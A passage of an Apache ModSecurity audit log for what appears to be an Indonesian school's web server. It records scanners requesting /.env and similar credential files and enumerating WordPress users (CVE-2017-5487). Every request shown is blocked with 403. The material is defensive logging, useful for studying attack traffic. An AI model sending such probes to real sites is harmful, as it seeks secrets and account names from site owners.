REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749301783740219 694 (- - -) Stopwatch2: 1749301783740219 694; combined=271, p1=235, p2=0, p3=0, p4=0, p5=36, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3ca8d239-Z-- --f1fbe52d-A-- [07/Jun/2025:20:14:47 +0700] aEQ7RxK9gc79coX6mHS2tAAAAEs 103.236.140.4 32968 103.236.140.4 8181 --f1fbe52d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 116.90.236.82 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 116.90.236.82 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --f1fbe52d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f1fbe52d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749302087711882 3376 (- - -) Stopwatch2: 1749302087711882 3376; combined=1475, p1=512, p2=921, p3=0, p4=0, p5=42, sr=99, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f1fbe52d-Z-- --f948f63b-A-- [07/Jun/2025:21:35:16 +0700] aEROJPClubEPOra_8Uk2LgAAAA4 103.236.140.4 33392 103.236.140.4 8181 --f948f63b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 67.207.87.214 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 67.207.87.214 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1) Gecko/20090624 Firefox/3.5 Accept-Charset: utf-8 --f948f63b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f948f63b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749306916166598 878 (- - -) Stopwatch2: 1749306916166598 878; combined=343, p1=299, p2=0, p3=0, p4=0, p5=44, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f948f63b-Z-- --ec496428-A-- [07/Jun/2025:21:44:08 +0700] aERQOGCOO9DrcKL2J_4odwAAANE 103.236.140.4 33504 103.236.140.4 8181 --ec496428-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 164.92.229.226 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 164.92.229.226 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --ec496428-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ec496428-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749307448451307 788 (- - -) Stopwatch2: 1749307448451307 788; combined=320, p1=279, p2=0, p3=0, p4=0, p5=41, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ec496428-Z-- --239d8e69-A-- [07/Jun/2025:21:48:40 +0700] aERRSBK9gc79coX6mHS25QAAAFU 103.236.140.4 33548 103.236.140.4 8181 --239d8e69-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 92.204.55.95 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 92.204.55.95 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --239d8e69-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --239d8e69-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749307720912846 3471 (- - -) Stopwatch2: 1749307720912846 3471; combined=1504, p1=515, p2=951, p3=0, p4=0, p5=37, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --239d8e69-Z-- --900e380f-A-- [07/Jun/2025:23:09:19 +0700] aERkLxK9gc79coX6mHS-dwAAAFI 103.236.140.4 36924 103.236.140.4 8181 --900e380f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.47.28.136 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.47.28.136 X-Forwarded-Proto: http Connection: close User-Agent: python-requests/2.31.0 Accept: */* --900e380f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --900e380f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749312559816497 1109 (- - -) Stopwatch2: 1749312559816497 1109; combined=516, p1=395, p2=0, p3=0, p4=0, p5=121, sr=98, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --900e380f-Z-- --73a62a31-A-- [07/Jun/2025:23:09:21 +0700] aERkMfClubEPOra_8Uk_2gAAABc 103.236.140.4 36926 103.236.140.4 8181 --73a62a31-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.47.28.140 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.47.28.140 X-Forwarded-Proto: https Connection: close User-Agent: python-requests/2.31.0 Accept: */* --73a62a31-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --73a62a31-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749312561717865 734 (- - -) Stopwatch2: 1749312561717865 734; combined=340, p1=232, p2=0, p3=0, p4=0, p5=108, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --73a62a31-Z-- --c0a1d747-A-- [07/Jun/2025:23:10:04 +0700] aERkXGCOO9DrcKL2J_4wogAAANA 103.236.140.4 36928 103.236.140.4 8181 --c0a1d747-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.139.45.163 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.139.45.163 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --c0a1d747-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c0a1d747-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749312604649655 806 (- - -) Stopwatch2: 1749312604649655 806; combined=324, p1=281, p2=0, p3=0, p4=0, p5=43, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c0a1d747-Z-- --09d0715b-A-- [07/Jun/2025:23:10:05 +0700] aERkXRK9gc79coX6mHS-eAAAAEo 103.236.140.4 36932 103.236.140.4 8181 --09d0715b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.139.45.163 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.139.45.163 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --09d0715b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --09d0715b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749312605338004 670 (- - -) Stopwatch2: 1749312605338004 670; combined=258, p1=224, p2=0, p3=0, p4=0, p5=34, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --09d0715b-Z-- --cf2add5c-A-- [07/Jun/2025:23:16:32 +0700] aERl4BK9gc79coX6mHS-fwAAAFA 103.236.140.4 36962 103.236.140.4 8181 --cf2add5c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safari/537.36 Accept-Charset: utf-8 --cf2add5c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cf2add5c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749312992585551 750 (- - -) Stopwatch2: 1749312992585551 750; combined=304, p1=268, p2=0, p3=0, p4=0, p5=36, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cf2add5c-Z-- --f112e54d-A-- [07/Jun/2025:23:23:52 +0700] aERnmBK9gc79coX6mHS-iQAAAEU 103.236.140.4 37066 103.236.140.4 8181 --f112e54d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; d-02K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.105 Safari/537.36 Accept-Charset: utf-8 --f112e54d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f112e54d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749313432169517 981 (- - -) Stopwatch2: 1749313432169517 981; combined=365, p1=309, p2=0, p3=0, p4=0, p5=56, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f112e54d-Z-- --f6843b24-A-- [07/Jun/2025:23:24:26 +0700] aERnuhK9gc79coX6mHS-igAAAEA 103.236.140.4 37102 103.236.140.4 8181 --f6843b24-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser; Avant Browser; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Accept-Charset: utf-8 --f6843b24-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f6843b24-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749313466514512 871 (- - -) Stopwatch2: 1749313466514512 871; combined=353, p1=310, p2=0, p3=0, p4=0, p5=43, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f6843b24-Z-- --e93e4836-A-- [08/Jun/2025:00:03:35 +0700] aERw52COO9DrcKL2J_4ynAAAAM8 103.236.140.4 43426 103.236.140.4 8181 --e93e4836-B-- GET /.env.backup HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.66 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/4.0 (Windows; U; MSIE 7.0; Windows NT 6.0; .NET CLR 1.0.40727; Media Center PC 4.0; InfoPath.1; en-NZ) Accept-Charset: utf-8 --e93e4836-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e93e4836-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749315815911998 859 (- - -) Stopwatch2: 1749315815911998 859; combined=394, p1=338, p2=0, p3=0, p4=0, p5=55, sr=98, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e93e4836-Z-- --bd1d4570-A-- [08/Jun/2025:00:56:51 +0700] aER9Y2COO9DrcKL2J_4ypQAAAMU 103.236.140.4 43800 103.236.140.4 8181 --bd1d4570-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 173.249.58.161 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 173.249.58.161 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3833.99 Safari/537.36 Accept-Charset: utf-8 --bd1d4570-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bd1d4570-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749319011904001 839 (- - -) Stopwatch2: 1749319011904001 839; combined=328, p1=291, p2=0, p3=0, p4=0, p5=37, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bd1d4570-Z-- --a6ed465e-A-- [08/Jun/2025:01:10:59 +0700] aESAs2COO9DrcKL2J_4yvAAAAM8 103.236.140.4 44304 103.236.140.4 8181 --a6ed465e-B-- GET /app/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.74 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.74 X-Forwarded-Proto: https Connection: close User-Agent: Avant Browser/1.2.789rel1 (http://www.avantbrowser.com) Accept-Charset: utf-8 --a6ed465e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a6ed465e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749319859942657 872 (- - -) Stopwatch2: 1749319859942657 872; combined=369, p1=313, p2=0, p3=0, p4=0, p5=55, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a6ed465e-Z-- --0842b04d-A-- [08/Jun/2025:01:23:08 +0700] aESDjJANhDjQAvBdMyEL6gAAAJM 103.236.140.4 44462 103.236.140.4 8181 --0842b04d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 49.156.1.105 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 49.156.1.105 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --0842b04d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0842b04d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749320588426596 2775 (- - -) Stopwatch2: 1749320588426596 2775; combined=1247, p1=422, p2=793, p3=0, p4=0, p5=32, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0842b04d-Z-- --ffe11731-A-- [08/Jun/2025:01:33:32 +0700] aESF_BK9gc79coX6mHTAXQAAAE8 103.236.140.4 44500 103.236.140.4 8181 --ffe11731-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.115.46 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.115.46 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux i686; rv:20.0) Gecko/20100101 Firefox/20.0 Accept-Charset: utf-8 --ffe11731-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ffe11731-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749321212403864 641 (- - -) Stopwatch2: 1749321212403864 641; combined=271, p1=231, p2=0, p3=0, p4=0, p5=40, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ffe11731-Z-- --a485a923-A-- [08/Jun/2025:01:56:43 +0700] aESLa5ANhDjQAvBdMyEMEgAAAJI 103.236.140.4 44656 103.236.140.4 8181 --a485a923-B-- GET /.env HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 78.153.140.222 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 78.153.140.222 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SPH-L710 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 --a485a923-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a485a923-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749322603486305 809 (- - -) Stopwatch2: 1749322603486305 809; combined=307, p1=268, p2=0, p3=0, p4=0, p5=39, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a485a923-Z-- --a3c28f26-A-- [08/Jun/2025:02:02:27 +0700] aESMw5ANhDjQAvBdMyEMHQAAAI4 103.236.140.4 44700 103.236.140.4 8181 --a3c28f26-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.211 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.211 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --a3c28f26-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a3c28f26-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749322947985914 765 (- - -) Stopwatch2: 1749322947985914 765; combined=311, p1=269, p2=0, p3=0, p4=0, p5=41, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a3c28f26-Z-- --5fc35308-A-- [08/Jun/2025:02:02:32 +0700] aESMyGCOO9DrcKL2J_4y9QAAANQ 103.236.140.4 44702 103.236.140.4 8181 --5fc35308-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.211 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.211 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --5fc35308-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5fc35308-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749322952994666 765 (- - -) Stopwatch2: 1749322952994666 765; combined=301, p1=263, p2=0, p3=0, p4=0, p5=37, 